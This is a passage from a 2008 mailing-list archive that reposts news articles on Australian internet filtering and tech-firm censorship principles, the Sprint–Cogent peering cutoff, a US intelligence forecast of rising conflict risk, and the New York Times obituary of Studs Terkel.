organisations, academics and investors, committed the technology firms to "protect the freedom of expression and privacy rights of their users".
Mr Conroy said trials were yet to be carried out, but "we are talking about mandatory blocking, where possible, of illegal material." The net nanny proposal was originally going to allow Australians who wanted uncensored access to the web the option of contacting their internet service provider to be excluded from the service. Human Rights Watch has condemned internet censorship, and argued to the US Senate "there is a real danger of a Virtual Curtain dividing the internet, much as the Iron Curtain did during the Cold War, because some governments fear the potential of the internet, (and) want to control it." Groups including the System Administrators Guild of Australia and Electronic Frontiers Australia have attacked the proposal, saying it would unfairly restrict Australians' access to the web, slow internet speeds and raise the price of internet access. EFA board member Colin Jacobs said it would have little effect on illegal internet content, including child pornography, as it would not cover file-sharing networks. "If the Government would actually come out and say we're only targeting child pornography it would be a different debate," he said. The technology companies' move, which follows criticism that the companies were assisting censorship of the internet in nations such as China, requires them to narrowly interpret government requests for information or censorship and to fight to minimise cooperation. The initiative provides a systematic approach to "work together in resisting efforts by governments that seek to enlist companies in acts of censorship and surveillance that violate international standards", the participants said. In a statement, Yahoo co-founder and chief executive Jerry Yang welcomed the new code of conduct. "These principles provide a valuable roadmap for companies like Yahoo operating in markets where freedom of expression and privacy are unfairly restricted," he said.
"Yahoo was founded on the belief that promoting access to information can enrich people's lives, and the principles we unveil today reflect our determination that our actions match our values around the world." Yahoo was thrust into the forefront of the online rights issue after the Californian company helped Chinese police identify cyber dissidents whose supposed crime was expressing their views online. China exercises strict control over the internet, blocking sites linked to Chinese dissidents, the outlawed Falun Gong spiritual movement, the Tibetan government-in-exile and those with information on the 1989 Tiananmen massacre. A number of US companies, including Microsoft, Cisco, Google and Yahoo, have been hauled before the US Congress in recent years and accused of complicity in building the "Great Firewall of China". The Australian Christian Lobby, however, has welcomed the proposals. Managing director Jim Wallace said the measures were needed. "The need to prevent access to illegal hard-core material and child pornography must be placed above the industry's desire for unfettered access," Mr Wallace said. From rforno at infowarrior.org Fri Oct 31 12:20:09 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 08:20:09 -0400 Subject: [Infowarrior] - Net Neutrality? Sprint cuts Cogent net routing Message-ID: <1F2B25BE-4733-4836-B662-69C4EB034838@infowarrior.org> http://www.earthtimes.org/articles/show/sprint-nextel-severs-its-internet-connection-to-cogent-communications,603138.shtml Sprint-Nextel Severs Its Internet Connection to Cogent Communications Posted : Fri, 31 Oct 2008 01:41:31 GMT Author : Cogent Communications Category : Press Release WASHINGTON, Oct. 30 /PRNewswire-FirstCall/ -- On October 30 at 4:30 pm Sprint-Nextel severed its Internet connection to Cogent thereby partitioning the Internet.
It is no longer possible for many Sprint customers and Cogent customers to directly communicate across the Internet. Sprint did so in violation of a contractual obligation to exchange Internet traffic with Cogent on a settlement free peering basis. Sprint and Cogent are engaged in litigation over this matter. Cogent regrets that Sprint chose to take this unilateral action rather than await a determination by the court as to the rights of the parties. Cogent remains ready to reestablish, on the same settlement free basis as previously existed, the connections that Sprint has severed. In the over 1300 on-net locations worldwide where Cogent provides service, Cogent is offering every Sprint-Nextel wireline customer that is unable to connect to Cogent's customers a free 100 megabit per second connection to the Internet for as long as Sprint continues to keep this partitioning of the Internet in place. Unfortunately, there is no way that Cogent can do the same for the wireless customers of Sprint-Nextel. All other major wireless carriers have full connectivity to Cogent and are unaffected by this event. From rforno at infowarrior.org Fri Oct 31 18:45:21 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 14:45:21 -0400 Subject: [Infowarrior] - World faces growing risk of war: US intelligence chief Message-ID: <6076F8A3-C15B-4F1F-8E7C-E41B49E00B4B@infowarrior.org> http://www.breitbart.com/print.php?id=081031180559.hq1yll01&show_article=1 World faces growing risk of war: US intelligence chief Oct 31 02:06 PM US/Eastern The world faces a growing risk of conflict over the next 20 to 30 years amid an unprecedented transfer of wealth and power from West to East, according to the US intelligence chief. Michael McConnell, the director of national intelligence, predicted rising demand for scarce supplies of food and fuel, strategic competition over new technologies, and the spread of weapons of mass destruction. 
"What I'm suggesting -- there's an increased potential for conflict," McConnell said in a speech Thursday to intelligence professionals in Nashville, Tennessee. "During the period of this assessment, out to 2025, the probability for conflict between nations and within nation-state entities will be greater," he said. Conditions for "large casualty terrorist attacks using chemical, biological, or less likely, nuclear materials" also will increase during that period, he said. McConnell described a multi-polar world in 2025 shaped by the rise of China, India and Brazil, whose economies will by then match those of the western industrial states. "In terms of size, speed, and directional flow, the transfer of global wealth and economic power, now underway, as noted from West to East is without precedent in modern history," McConnell said. Territorial expansion and military rivalries are not likely but cannot be ruled out, he said. "We judge these sweeping changes will not trigger a complete breakdown of the current international system, but the next 20 years of transition to a new system are fraught with risks and many, many challenges," he said. By 2025, China is likely to have the world's second largest economy and to have emerged as a major military power, the largest importer of natural resources and the largest contributor to world pollution. "China is poised to have more impact on the world over the next 20 years than any other country," he said. India will have either the third or second largest economy and will press to become "one of the significant poles of this new world," he said. Russia also will be part of that group but only if it expands and diversifies its economy and integrates it with the world global economy, he said. "Strategic rivalries are most likely to revolve around trade, demographics, access to natural resources, investments and technological innovation. 
There will be a struggle to acquire technology advantage as the key enabler for dominance," he said. Copyright AFP 2008, AFP stories and photos shall not be published, broadcast, rewritten for broadcast or publication or redistributed directly or indirectly in any medium From rforno at infowarrior.org Fri Oct 31 23:38:26 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 31 Oct 2008 19:38:26 -0400 Subject: [Infowarrior] - RIP Studs Terkel Message-ID: <2B1E308C-9925-408D-8591-62F39427FFD2@infowarrior.org> November 1, 2008 Studs Terkel, Chronicler of the American Everyman, Is Dead at 96 By WILLIAM GRIMES http://www.nytimes.com/2008/11/01/books/01terkel.html?_r=1&hp=&oref=slogin&pagewanted=print Studs Terkel, a Pulitzer prize-winning author whose searching interviews with ordinary Americans helped establish oral history as an important historical genre, and who for nearly half a century was the voluble host of a radio show in Chicago, died Friday at his home in Chicago. He was 96. His death was confirmed by Lois Baum, a friend and longtime colleague at WFMT radio. In his oral histories, which he called guerrilla journalism, Studs Terkel relied on his enthusiastic but gentle interviewing style to elicit, in rich detail, the experiences and thoughts of ordinary Americans. "Division Street: America" (1966), his first best-seller and the first in a triptych of tape-recorded works, explored the urban conflicts of the 1960s. Its success led to "Hard Times: An Oral History of the Great Depression" (1970) and "Working: People Talk About What They Do All Day and How They Feel About What They Do" (1974). "'The Good War': An Oral History of World War II" won the 1985 Pulitzer Prize for nonfiction. In "Talking to Myself," Mr. Terkel turned the microphone on himself to produce an engaging memoir, and more recently, in "Race: How Blacks and Whites Think and Feel About the American Obsession"
(1992) and "Coming of Age: The Story of Our Century by Those Who've Lived It" (1995), he reached for his ever-present tape recorder for interviews on race relations in the United States and the experience of growing old. Although detractors derided him as a sentimental populist whose views were simplistic and occasionally maudlin, Mr. Terkel was widely credited with transforming oral history into a popular literary form. In 1985 a reviewer for The Financial Times of London characterized Mr. Terkel's books as "completely free of sociological claptrap, armchair revisionism and academic moralizing." The elfin, amiable Mr. Terkel was a gifted and seemingly tireless interviewer who elicited provocative insights and colorful, detailed personal histories from a broad mix of people. "The thing I'm able to do, I guess, is break down walls," he once told an interviewer. "If they think you're listening, they'll talk. It's more of a conversation than an interview." Mr. Terkel succeeded as an interviewer in part because he believed most people had something to say worth hearing. "The average American has an indigenous intelligence, a native wit," he said. "It's only a question of piquing that intelligence." In "American Dreams: Lost and Found" (1980), he interviewed police officers and convicts, nurses and loggers, former slaves and former Ku Klux Klansmen, a typical crowd for Mr. Terkel. Readers of his books could only guess at Mr. Terkel's interview style. Listeners to his daily radio show, which was broadcast on WFMT since 1958, got the full Terkel flavor, as the host, with breathy eagerness and a tough-guy Chicago accent, went after the straight dope from such guests as Sir Georg Solti, Toni Morrison and Gloria Steinem. "It isn't an inquisition, it's an exploration, usually an exploration into the past," he once said, explaining his approach. "So I think the gentlest question is the best one, and the gentlest is, 'And what happened then?'"
Studs Terkel was born in the Bronx on May 16, 1912, the third son of Samuel Terkel, a tailor, and the former Anna Finkel, who had immigrated from Bialystok, Poland. In 1923 the family moved to Chicago. In the late 1930s, while acting in the theater, Mr. Terkel dropped his given name, Louis, and adopted the name Studs, from another colorful Chicagoan, James T. Farrell's fictional Studs Lonigan. His childhood was unhappy. The boy's father was an invalid who suffered from heart disease. His mother was volatile and impetuous, given to unpredictable rages that kept the household in a state of fear and apprehension. "What nobody got from her was warmth and love, or at least not a display of it," Mr. Terkel said. After moving to Chicago, the Terkels managed hotels popular with blue-collar workers, and Mr. Terkel often said that the characters he encountered and the disputations he witnessed at the Wells-Grand Hotel on the Near North Side were his real education. Although he read avidly and feasted on Roget's Thesaurus, he was, by his own reckoning, no scholar. He earned philosophy and law degrees at the University of Chicago, but after failing a bar exam he worked briefly for the Federal Emergency Relief Administration in Chicago, doing statistical research on unemployment in Omaha. He then found work counting bonds for the Treasury Department in Washington. When he returned to Chicago in 1938, Mr. Terkel, who once described his life as "an accretion of accidents," joined the Federal Writers' Project, a New Deal program. He wrote scripts for WGN radio and, after appearing in "Waiting for Lefty" at the Chicago Repertory Group, found work in soap operas like "Ma Perkins" and "Road of Life." What he called his "low, husky, menacing" voice made him a natural to play heavies. "I would always say the same thing and either get killed or sent to Sing-Sing," he later recalled. It was while performing with the Chicago Repertory Group that he took the name Studs.
In 1939 he married Ida Goldberg, a social worker from Wisconsin whom he met while they were both with the Chicago Rep. She died in 1999. The couple had one son, Dan Terkell, who lives in Chicago. After a one-year stint writing speeches and shows in the special services of the Army Air Corps in 1942 and 1943, he was discharged from the military because his perforated eardrums, the result of childhood operations, made him unfit for overseas duty. He found work doing news, sports and commentary for commercial radio stations in Chicago, and in 1945 he was given his own radio show, "The Wax Museum," on WENR. Although the show, which ran for two years, was primarily a jazz program, Mr. Terkel also followed his other enthusiasms, playing country music, folk, opera and gospel, as the mood seized him. He was one of the first to promote artists like Mahalia Jackson, Pete Seeger, Woody Guthrie, Big Bill Broonzy and Burl Ives. On occasion, he would invite composers or performers to sit down for an on-air interview. His passion for jazz led to his first book, "Giants of Jazz" (1957), a collection of jazz biographies. In 1950, Mr. Terkel became the star and host of "Studs' Place," a variety show set in a barbecue joint, with Mr. Terkel appearing as the owner, shooting the breeze with his staff and with the guest of the week. (In a short-lived precursor of the show, Mr. Terkel played a New York bartender.) Along with Dave Garroway's talk show and "Kukla, Fran and Ollie," the program helped define the relaxed, low-key Chicago school of television. In January, 1952, with McCarthyism in full flower, NBC canceled the show shortly after picking it up for national broadcast, nervous because Mr. Terkel had a habit of signing petitions in support of liberal and left-wing causes. Executives in New York told him that he could clear his record by saying that he had been duped into signing the petitions. Mr. Terkel refused. "Duped" made him sound stupid, he said.
Blackballed from commercial radio, Mr. Terkel found work in the theater, appearing in a national tour of "Detective Story" and in other plays. One day, in October, 1952, he was surprised to hear Woody Guthrie on the radio. "I wondered, who plays Guthrie records except me?" he later recalled. "So I called WFMT. They were delighted to hear from me." In a partnership that would endure for more than 45 years, Mr. Terkel broadcast a daily hour of music, commentary and interviews, helping to build WFMT into a major fine-arts station syndicated around the country. Although he shied away from actors and politicians, anyone else was fair game, and the guest roster included figures as diverse as John Kenneth Galbraith, Garry Wills, Aaron Copland and Oliver Sacks. In 1980 he won a Peabody Award for excellence in journalism. His official title at the station, where he was instantly recognizable by his wayward white hair, red-and-white-checked shirts, and well-chewed cigar, was Free Spirit. In the 1960s, André Schiffrin, the publisher and editor who ran Pantheon Books, was looking for a writer to produce the American equivalent of Jan Myrdal's "Report from a Chinese Village," a collection of interviews that shed light on the lives of ordinary Chinese under Mao. He called Mr. Terkel and suggested Chicago as a subject. Mr. Terkel went out into the city's neighborhoods, tape recorder in hand, and produced "Division Street," an enormous success and the beginning of a lifelong relationship in which Mr. Schiffrin would propose an idea and Mr. Terkel would execute it. "Division Street" consisted of transcripts of 70 conversations that Mr. Terkel had with people of every sort in and around Chicago. Peter Lyon, reviewing it in The New York Times Book Review, said it was "a modern morality play, a drama with as many conflicts as life itself." In "The Great Divide: Second Thoughts on the American Dream" (1989), he returned to an earlier subject and looked at it afresh.
When Random House executives forced out Mr. Schiffrin as head of Pantheon, Mr. Terkel walked out with him, bringing his work to Mr. Schiffrin's New Press, which published "My American Century," a "best of" compilation. It was followed by three more volumes of memoirs, "My American Century" (1997), "Touch and Go" (2007), and the forthcoming "P.S.: Further Thoughts from a Lifetime of Listening," which is due out on Nov. 11. In 1997 he received the National Book Foundation Medal to honor his contributions to American letters. In "Talking to Myself: A Memoir of My Times," Mr. Terkel took on his toughest interview, and many critics found the book frustrating for its refusal to delve too deeply into its author's personal life and feelings. Mr. Terkel acknowledged the justice of the complaint. "I've met hundreds, no, I've met thousands of interesting people, and I've been so caught up with them and fascinated by them and intrigued with them it's almost like there's no room inside me to be interested in my own feelings and thoughts," he told an interviewer. It may be the one time in his life that Mr. Terkel's ruling passion failed him. "I don't have to stay curious, I am curious, about all of it, all the time," he once said. "'Curiosity never killed this cat': that's what I'd like as my epitaph."